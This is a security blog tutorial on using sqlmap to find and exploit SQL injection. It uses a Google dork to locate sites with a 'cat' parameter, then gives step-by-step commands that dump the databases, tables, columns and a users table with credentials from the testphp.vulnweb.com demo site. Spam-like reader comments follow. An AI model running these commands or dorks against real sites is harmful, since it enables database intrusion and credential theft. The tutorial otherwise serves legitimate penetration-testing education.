Hey Folks, in this tutorial we are going to demonstrate database hacking through one of the most valuable tool called is “sqlmap“. The tutorial is designed for education purposes only where we will point you to the complete steps to acquire a web server due to the vulnerability of sql injection using the sqlmap tool.
Hmm ! But why do we use the sqlmap tool ? 🙂 ! SQL injection vulnerabilities can be detected using some well-known payloads, but exploiting the vulnerability can be complicated if you are a beginner, that’s why we use tools such as the “sqlmap” that is capable of exploiting SQL injection vulnerabilities using multiple combinations of payloads per second. sqlmap is an open source penetration testing tool that automates the process of detecting, exploiting the SQL injection vulnerability and taking over of database servers.
Keep in Mind 🙂 Usage of sqlmap for attacking targets without prior mutual consent is illegal.
Lets take a look 🙂 !!
SQL injection vulnerability comes out on top in OWASP Top 10 and even the most critical injection vulnerabilities. Injection flaws occur when a web application accepts an untrusted user supply and executes it directly in the database as a command or query. Likewise SQL injection is a code injection technique, used to attack data-driven applications, in which malicious SQL statements are inserted into an any entry field for execution purposes by attacker. So there are two ways to detect and exploit SQL injection vulnerabilities.
However, we will do the same thing in both ways, but for the manual method you should have a lot more knowledge about MySQL database statements and if you are a beginner then you should go with automated tools. In this article we will take the help of “SQLmap” automated tool to perform MySQL database hacking or penetration testing. Let’s start !!
The Sqlmap tool comes pre-installed in the Kali Linux operating system but sometimes we do not have the same operating system, so we will try to download and configure this tool separately. To configure the slqmap tool in any operating system, we must first meet the requirements of this tool. Let’s install “python2” tool first using the following command.
pkg install python2 && pkg install python2Now we’ll download the sqlmap tool by using the git command, after downloading is done then we will go to the directory and boot this tool by using the python script.
git clone https://github.com/sqlmapproject/sqlmap.git
cd sqlmap
python2 sqlmap.pyAs we know it comes pre-installed in Kali Linux operating system but sometimes we forget to upgrade the installed tool, hence we can upgrade our sqlmap tool using the following command.
apt-get upgrade sqlmapLikewise you can read complete features of this tool from here 🙂 !!
Google Dorks useful for passive information gathering purposes. This is the best way to reconnaissance about the target website even the target site doesn’t know about our reconnaissance. We donot have any vulnerable website where we can perform SQL injection 💉 hence we will take help of google dork. We will try to find the vulnerability in web application through “cat” parameter. But the question is, why do we choose the parameter itself to test or exploit the SQL injection vulnerability ? Ok !! Originally the parameter is also known by the alias of the query strings and according to Google it is a way of passing information to the server through a URL, that’s why attackers takes help of parameter’s to insert their malicious SQL statements directly into the database. You choose any parameter according to you and change it in the given google dork and do a search on google.
inurl:".php?cat=" inurl:"Google gives many websites in which the “cat” parameter is being used to show the content of web pages or different-2 purposes. We choose the following website and as soon as we add single quote after “?cat=” parameter we get an MySQL syntax error which means the site is vulnerable to the SQL injection vulnerability.
http://testphp.vulnweb.com/listproducts.php?cat=1'Thus, we can try to identify SQL injection vulnerabilities by deploying a separate -2 meta character. It is now discovered that the website is insecure and we will get data from the database using the sqlmap tool.
http://testphp.vulnweb.com/listproducts.php?cat=1""Our first objective will be to dump the entire database from the web server. Check the command below in which the “U” parameter has been used to give the exact location of the SQL injection vulnerability found in the website. The “dbs” parameter is being used to dump the names of the database.
Usage 🙂 !! sqlmap -u “<URL>>” –dbs
sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=1" --dbsGreat 🙂 !! Sqlmap has successfully detected the SQL injection vulnerability which results in us getting the database name which is available in the web application.
We want to erase a question in your mind related to batch commands. SQLMap may ask us to provide input during the scan, hence we use this feature to discard everything after which it do all these tasks ourselves.
Usage 🙂 !! sqlmap -u “<URL>>” –dbs –batch
sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=1" --dbs --batchAs you can see the two databases are built into the web application database server.
As we know that an SQL database contains multiple objects such as tables. So we will select one of the two databases and try to dump the names of the tables present in the database using the following command. “-D” used for database name.
Usage 🙂 !! sqlmap -u “<URL>>” -D < database name > –tables
sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=1" -D acuart --tablesGreat 🙂 !! We get what we thought ! As you can see after executing the above we got the name of the tables present in the web application database.
In a relational database, a column is a set of data values in which contain text values, numbers, email and passwords. Now you can select any one table you want to dump but in our case we will select the “users” table to get sensitive information from the database.
Usage 🙂 !! sqlmap -u “<URL>>” -D < database name > -T < tables name > –columns
sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=1" -D acuart -T users --columnsAlright 🙂 !! We are going the right way and as you can see we have successfully dumped all the columns using the above command. Now we have all the sensitive files in front of us, let’s try to dump them.
The wait is over now and we will first dump the email address files from the database. Just add the column name to the command and dump the file.
Usage 🙂 !! sqlmap -u “<URL>>” -D < database name > -T < tables name > -C < columns name > –dump
sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=1" -D acuart -T users -C email --dumpYEHE 🙂 !! You can see that we have found an email address in the files which is not enough. So let’s try to dump the whole table.
As you see, dumping the tables one by one and then their columns will be a very long process, hence we will dump the entire table at once by adding the “dump” parameter after the table.
Usage 🙂 !! sqlmap -u “<URL>>” -D < database name > -T < tables name > –dump –batch
sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=1" -D acuart -T users --dump --batchAmazing 🙂 !! Finally we get sensitive credentials of users after dumping entire “user” tables and thus we have successfully hacked the back end database of the web application by using the sqlmap tool.
This tool has another feature through which we can dump the number of multiple tables at once. Let’s try it also. Just after selecting any database you need to add “--dump-all” feature.
Usage 🙂 !! sqlmap -u “<URL>>” -D < database name > –dump-all –batch
sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=1" -D acuart ---dump-all --batchDone 🙂 !! We cannot show all the results due to maximum size of screenshot but you can see that all the tables, columns and data are dumped at once as soon as the above command is executed.
As you have seen how attackers steal and hack data with the help of these tools due to SQL injection vulnerability in web application.
Keep in Mind 🙂 Usage of sqlmap for attacking targets without prior mutual consent is illegal and this tutorial is made for educational purposes.
Credit : wikipedia.org & sqlmap.org
A keen learner and passionate IT student. He has done Web designing, CCNA, RedHat, Ethical hacking, Network & web penetration testing. Currently, he is completing his graduation and learning about Red teaming, CTF challenges & Blue teaming.
The gau (Get All URLs) tool is a versatile open-source utility that collects URLs from…
Jsluice++ is a Burp Suite extension designed for passive and active scanning of JavaScript traffic…
Hey Folks :) !! In this tutorial, we will describe some of the techniques commonly…
Hey Folks :) !! In this article, we present the "Termux Cheat Sheet for Hackers"…
Amid the rapid advancement of technology, the significance of human involvement in cybersecurity frequently goes…
Hey Folks, we are back today after such a long break, but don't worry we…
This website uses cookies.
View Comments
I all the time used to study article in news papers but now as I am a user of net so from now I am using net for articles or reviews, thanks to web.
Thanks :) !!
I love reading this web content. Very useful for me. Thank you.
I love reading this web content. Very useful for me. Thank you.
When someone writes an post he/she retains the plan of a user in his/her
mind that how a user can know it. Thus that's why this article is
amazing. Thanks!
Woԝ, incredible blog layout! How long have you been ƅlogging for?
yoᥙ make blogging lοok easy. The overall look of yоur ᴡebsite is excellent, as wеll as
thе c᧐ntent!
Its like you read my thoughts! You appear to grasp so much approximately this, like you wrote the guide in it or something.
I think that you could do with a few % to power the message
home a little bit, however instead of that, that is excellent blog.
A great read. I'll certainly be back.
Combines agility & elasticity with fast deployment & distribution inside your data center, to benefit from full-featured Oracle Cloud solutions with the new Oracle Cloud at Customer Gen 2 delivered by Logika IT Solutions.
Thank you for the auspicious writeup. It in fact was a amusement account
it. Look advanced to far added agreeable from you! By the way, how can we
communicate?
Right here is the right site for anybody who hopes to find out about
this topic. You understand a whole lot its almost
hard to argue with you (not that I personally would want to…HaHa).
You definitely put a new spin on a subject that's been discussed for
a long time. Excellent stuff, just excellent!
Great weblog right here! Also your site quite a bit up fast!
What web host are you the use of? Can I get
your associate link in your host? I want my web site loaded up as
fast as yours lol
Thanks for your valuable feedback :) !!